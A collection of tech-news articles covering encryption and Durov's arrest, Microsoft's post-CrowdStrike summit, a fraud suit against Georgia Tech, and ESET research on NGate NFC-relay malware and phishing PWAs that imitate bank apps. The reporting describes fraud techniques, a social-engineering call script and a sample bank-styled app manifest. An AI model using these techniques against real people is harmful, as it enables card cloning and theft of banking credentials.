Durov appears to be an old-school cyber-libertarian who believes in privacy and encryption. His arrest will certainly resonate in America, which has seen a similar debate over how much online services should cooperate with law enforcement. The FBI, for instance, has occasionally warned that end-to-end encryption will result in a “going dark” problem in which crime simply disappears from their view, and the US has seen repeated attempts to legislate backdoors into encryption systems. Those have all been defeated, however, and civil liberties advocates and techies generally note that creating backdoors makes such systems fundamentally insecure. The global debate over crime, encryption, civil liberties, and messaging apps is sure to heat up with Durov’s arrest.



Microsoft to host security summit after CrowdStrike disaster

Bugging out —

Redmond wants to improve the resilience of Windows to buggy software.


Microsoft is stepping up its plans to make Windows more resilient to buggy software after a botched CrowdStrike update took down millions of PCs and servers in a global IT outage.

The tech giant has in the past month intensified talks with partners about adapting the security procedures around its operating system to better withstand the kind of software error that crashed 8.5 million Windows devices on July 19.

Critics say that any changes by Microsoft would amount to a concession of shortcomings in Windows’ handling of third-party security software that could have been addressed sooner.

Yet they would also prove controversial among security vendors that would have to make radical changes to their products, and force many Microsoft customers to adapt their software.

Last month’s outages—which are estimated to have caused billions of dollars in damages after grounding thousands of flights and disrupting hospital appointments worldwide—heightened scrutiny from regulators and business leaders over the extent of access that third-party software vendors have to the core, or kernel, of Windows operating systems.

Microsoft will host a summit next month for government representatives and cyber security companies, including CrowdStrike, to “discuss concrete steps we will all take to improve security and resiliency for our joint customers,” Microsoft said on Friday.

The gathering will take place on September 10 at Microsoft’s headquarters near Seattle, it said in a blog post.

Bugs in the kernel can quickly crash an entire operating system, triggering the millions of “blue screens of death” that appeared around the globe after CrowdStrike’s faulty software update was sent out to clients’ devices.

Microsoft told the Financial Times it was considering several options to make its systems more stable and had not ruled out completely blocking access to the Windows kernel—an option some rivals fear would put their software at a disadvantage to the company’s internal security product, Microsoft Defender.

“All of the competitors are concerned that [Microsoft] will use this to prefer their own products over third-party alternatives,” said Ryan Kalember, head of cyber security strategy at Proofpoint.

Microsoft may also demand new testing procedures from cyber security vendors rather than adapting the Windows system itself.

Apple, which was not hit by the outages, blocks all third-party providers from accessing the kernel of its MacOS operating system, forcing them to operate in the more limited “user-mode.”

Microsoft has previously said it could not do the same, after coming to an understanding with the European Commission in 2009 that it would give third parties the same access to its systems as that for Microsoft Defender.

Some experts said, however, that this voluntary commitment to the EU had not tied Microsoft’s hands in the way it claimed, arguing that the company had always been free to make the changes now under consideration.

“These are technical decisions of Microsoft that were not part of [the arrangement],” said Thomas Graf, a partner at Cleary Gottlieb in Brussels who was involved in the case.

“The text [of the understanding] does not require them to give access to the kernel,” added AJ Grotto, a former senior director for cyber security policy at the White House.

Grotto said Microsoft shared some of the blame for the July disruption since the outages would not have been possible without its decision to allow access to the kernel.

Nevertheless, while it might boost a system’s resilience, blocking kernel access could also bring “real trade-offs” for the compatibility with other software that had made Windows so popular among business customers, Forrester analyst Allie Mellen said.

“That would be a fundamental shift for Microsoft’s philosophy and business model,” she added.

Operating exclusively outside the kernel may lower the risk of triggering mass outages but it was also “very limiting” for security vendors and could make their products “less effective” against hackers, Mellen added.

Operating within the kernel gave security companies more information about potential threats and enabled their defensive tools to activate before malware could take hold, she added.

An alternative option could be to replicate the model used by the open-source operating system Linux, which uses a filtering mechanism that creates a segregated environment within the kernel in which software, including cyber defense tools, can run.

But the complexity of overhauling how other security software works with Windows means that any changes will be hard for regulators to police and Microsoft will have strong incentives to favor its own products, rivals said.

It “sounds good on paper, but the devil is in the details,” said Matthew Prince, chief executive of digital services group Cloudflare.

© 2024 The Financial Times Ltd. All rights reserved. Not to be redistributed, copied, or modified in any way.



After cybersecurity lab wouldn’t use AV software, US accuses Georgia Tech of fraud


Dr. Emmanouil “Manos” Antonakakis runs a Georgia Tech cybersecurity lab and has attracted millions of dollars in the last few years from the US government for Department of Defense research projects like “Rhamnousia: Attributing Cyber Actors Through Tensor Decomposition and Novel Data Acquisition.”

The government yesterday sued Georgia Tech in federal court, singling out Antonakakis and claiming that neither he nor Georgia Tech followed basic (and required) security protocols for years, knew they were not in compliance with such protocols, and then submitted invoices for their DoD projects anyway. (Read the complaint.) The government claims this is fraud:

At bottom, DoD paid for military technology that Defendants stored in an environment that was not secure from unauthorized disclosure, and Defendants failed to even monitor for breaches so that they and DoD could be alerted if information was compromised. What DoD received for its funds was of diminished or no value, not the benefit of its bargain.

AV hate

Given the nature of his work for DoD, Antonakakis and his lab are required to abide by many sets of security rules, including those outlined in NIST Special Publication 800-171, “Protecting Controlled Unclassified Information in Nonfederal Information Systems and Organizations.”

One of the rules says that machines storing or accessing such “controlled unclassified information” need to have endpoint antivirus software installed. But according to the US government, Antonakakis really, really doesn’t like putting AV detection software on his lab’s machines.

Georgia Tech admins asked him to comply with the requirement, but according to an internal 2019 email, Antonakakis “wasn’t receptive to such a suggestion.” In a follow-up email, Antonakakis himself said that “endpoint [antivirus] agent is a nonstarter.”

According to the government, “Other than Dr. Antonakakis’s opposition, there was nothing preventing the lab from running antivirus protection. Dr. Antonakakis simply did not want to run it.”

The IT director for Antonakakis’ lab was allowed to use other “mitigating measures” instead, such as relying on the school’s firewall for additional security. The IT director said that he thought Georgia Tech ran antivirus scans from its network. However, this “assumption” turned out to be completely wrong; the school’s network “has never provided” antivirus protection and, even if it had, the lab used laptops that were regularly taken outside the network perimeter.

The school realized after some time that the lab was not in compliance with the DoD contract rules, so an administrator decided to “suspend invoicing” on the lab’s contracts so that the school would not be charged with filing false claims.

According to the government, “Within a few days of the invoicing for his contracts being suspended, Dr. Antonakakis relented on his years-long opposition to the installation of antivirus software in the Astrolavos Lab. Georgia Tech’s standard antivirus software was installed throughout the lab.”

But, says the government, the school never acknowledged that it had been out of compliance for some time and that it had filed numerous invoices while noncompliant. In the government’s telling, this is fraud.



Android malware steals payment card data using previously unseen technique

NEW ATTACK SCENARIO —

Attacker then emulates the card and makes withdrawals or payments from victim’s account.


Newly discovered Android malware steals payment card data using an infected device’s NFC reader and relays it to attackers, a novel technique that effectively clones the card so it can be used at ATMs or point-of-sale terminals, security firm ESET said.

ESET researchers have named the malware NGate because it incorporates NFCGate, an open source tool for capturing, analyzing, or altering NFC traffic. Short for Near-Field Communication, NFC is a protocol that allows two devices to wirelessly communicate over short distances.

New Android attack scenario

“This is a new Android attack scenario, and it is the first time we have seen Android malware with this capability being used in the wild,” ESET researcher Lukas Stefanko said in a video demonstrating the discovery. “NGate malware can relay NFC data from a victim’s card through a compromised device to an attacker’s smartphone, which is then able to emulate the card and withdraw money from an ATM.”

Lukas Stefanko—Unmasking NGate.

The malware was installed through traditional phishing scenarios, such as the attacker messaging targets and tricking them into installing NGate from short-lived domains that impersonated the banks or official mobile banking apps available on Google Play. Masquerading as a legitimate app for a target’s bank, NGate prompts the user to enter the banking client ID, date of birth, and the PIN code corresponding to the card. The app goes on to ask the user to turn on NFC and to scan the card.

ESET said it discovered NGate being used against three Czech banks starting in November and identified six separate NGate apps circulating between then and March of this year. Some of the apps used in later months of the campaign came in the form of PWAs, short for Progressive Web Apps, which as reported Thursday can be installed on both Android and iOS devices even when settings (mandatory on iOS) prevent the installation of apps available from non-official sources.

The most likely reason the NGate campaign ended in March, ESET said, was the arrest by Czech police of a 22-year-old they said they caught wearing a mask while withdrawing money from ATMs in Prague. Investigators said the suspect had “devised a new way to con people out of money” using a scheme that sounds identical to the one involving NGate.

Stefanko and fellow ESET researcher Jakub Osmani explained how the attack worked:

The announcement by the Czech police revealed the attack scenario started with the attackers sending SMS messages to potential victims about a tax return, including a link to a phishing website impersonating banks. These links most likely led to malicious PWAs. Once the victim installed the app and inserted their credentials, the attacker gained access to the victim’s account. Then the attacker called the victim, pretending to be a bank employee. The victim was informed that their account had been compromised, likely due to the earlier text message. The attacker was actually telling the truth – the victim’s account was compromised, but this truth then led to another lie.

To “protect” their funds, the victim was requested to change their PIN and verify their banking card using a mobile app – NGate malware. A link to download NGate was sent via SMS. We suspect that within the NGate app, the victims would enter their old PIN to create a new one and place their card at the back of their smartphone to verify or apply the change.

Since the attacker already had access to the compromised account, they could change the withdrawal limits. If the NFC relay method didn’t work, they could simply transfer the funds to another account. However, using NGate makes it easier for the attacker to access the victim’s funds without leaving traces back to the attacker’s own bank account. A diagram of the attack sequence is shown in Figure 6.

NGate attack overview.

ESET

The researchers said NGate or apps similar to it could be used in other scenarios, such as cloning some smart cards used for other purposes. The attack would work by copying the unique ID of the NFC tag, abbreviated as UID.

“During our testing, we successfully relayed the UID from a MIFARE Classic 1K tag, which is typically used for public transport tickets, ID badges, membership or student cards, and similar use cases,” the researchers wrote. “Using NFCGate, it’s possible to perform an NFC relay attack to read an NFC token in one location and, in real time, access premises in a different location by emulating its UID, as shown in Figure 7.”

Figure 7. Android smartphone (right) that read and relayed an external NFC token’s UID to another device (left).

ESET

The cloning could all occur in situations where the attacker has physical access to a card or is able to briefly read a card in unattended purses, wallets, backpacks, or smartphone cases holding cards. Performing and emulating such attacks requires a rooted and customized Android device; phones infected by NGate didn’t have that requirement.



Novel technique allows malicious apps to escape iOS and Android guardrails

NOW YOU KNOW —

Web-based apps escape iOS “Walled Garden” and Android side-loading protections.


Phishers are using a novel technique to trick iOS and Android users into installing malicious apps that bypass safety guardrails built by both Apple and Google to prevent unauthorized apps.

Both mobile operating systems employ mechanisms designed to help users steer clear of apps that steal their personal information, passwords, or other sensitive data. iOS bars the installation of all apps other than those available in its App Store, an approach widely known as the Walled Garden. Android, meanwhile, is set by default to allow only apps available in Google Play. Sideloading—or the installation of apps from other markets—must be manually allowed, something Google warns against.

When native apps aren’t

Phishing campaigns making the rounds over the past nine months are using previously unseen ways to work around these protections. The objective is to trick targets into installing a malicious app that masquerades as an official one from the targets’ bank. Once installed, the malicious app steals account credentials and sends them to the attacker in real time over Telegram.

“This technique is noteworthy because it installs a phishing application from a third-party website without the user having to allow third-party app installation,” Jakub Osmani, an analyst with security firm ESET, wrote Tuesday. “For iOS users, such an action might break any ‘walled garden’ assumptions about security. On Android, this could result in the silent installation of a special kind of APK, which on further inspection even appears to be installed from the Google Play store.”

The novel method involves enticing targets to install a special type of app known as a Progressive Web App. These apps rely solely on Web standards to render functionalities that have the feel and behavior of a native app, without the restrictions that come with them. The reliance on Web standards means PWAs, as they’re abbreviated, will in theory work on any platform running a standards-compliant browser, making them work equally well on iOS and Android. Once installed, users can add PWAs to their home screen, giving them a striking similarity to native apps.
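What makes a PWA installable is a small web app manifest that the browser reads when the user adds it to the home screen; the name and icon declared there are what give the home-screen entry its native look. A minimal, hypothetical example (the field names come from the Web App Manifest standard; all values here are invented, not taken from the campaigns ESET observed):

```json
{
  "name": "Example Bank",
  "short_name": "Bank",
  "start_url": "/app/",
  "display": "standalone",
  "background_color": "#ffffff",
  "theme_color": "#004488",
  "icons": [
    { "src": "/icons/bank-192.png", "sizes": "192x192", "type": "image/png" }
  ]
}
```

The `"display": "standalone"` setting hides the browser chrome entirely, which is part of why a phishing PWA can pass for a native banking app once it sits on the home screen.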

While PWAs exist on both iOS and Android, Osmani’s post uses the term PWA for the iOS apps and WebAPK for their Android counterparts.

Installed phishing PWA (left) and real banking app (right).

ESET

Comparison between an installed phishing WebAPK (left) and real banking app (right).

ESET

The attack begins with a message sent either by text message, automated call, or through a malicious ad on Facebook or Instagram. When targets click on the link in the scam message, they open a page that looks similar to the App Store or Google Play.

Example of a malicious advertisement used in these campaigns.

ESET

Phishing landing page imitating Google Play.

ESET

ESET’s Osmani continued:

From here victims are asked to install a “new version” of the banking application; an example of this can be seen in Figure 2. Depending on the campaign, clicking on the install/update button launches the installation of a malicious application from the website, directly on the victim’s phone, either in the form of a WebAPK (for Android users only), or as a PWA for iOS and Android users (if the campaign is not WebAPK based). This crucial installation step bypasses traditional browser warnings of “installing unknown apps”: this is the default behavior of Chrome’s WebAPK technology, which is abused by the attackers.

Example copycat installation page.

ESET

The process is a little different for iOS users, as an animated pop-up instructs victims how to add the phishing PWA to their home screen (see Figure 3). The pop-up copies the look of native iOS prompts. In the end, even iOS users are not warned about adding a potentially harmful app to their phone.

Figure 3: iOS pop-up instructions after clicking “Install” (credit: Michal Bláha)

ESET

After installation, victims are prompted to submit their Internet banking credentials to access their account via the new mobile banking app. All submitted information is sent to the attackers’ C&C servers.

The technique is made all the more effective because application information associated with the WebAPKs will show they were installed from Google Play and have been assigned no system privileges.

WebAPK info menu—notice the “No Permissions” at the top and “App details in store” section at the bottom.

ESET

So far, ESET is aware of the technique being used against customers of banks mostly in Czechia and less so in Hungary and Georgia. The attacks used two distinct command-and-control infrastructures, an indication that two different threat groups are using the technique.

“We expect more copycat applications to be created and distributed, since after installation it is difficult to separate the legitimate apps from the phishing ones,” Osmani said.
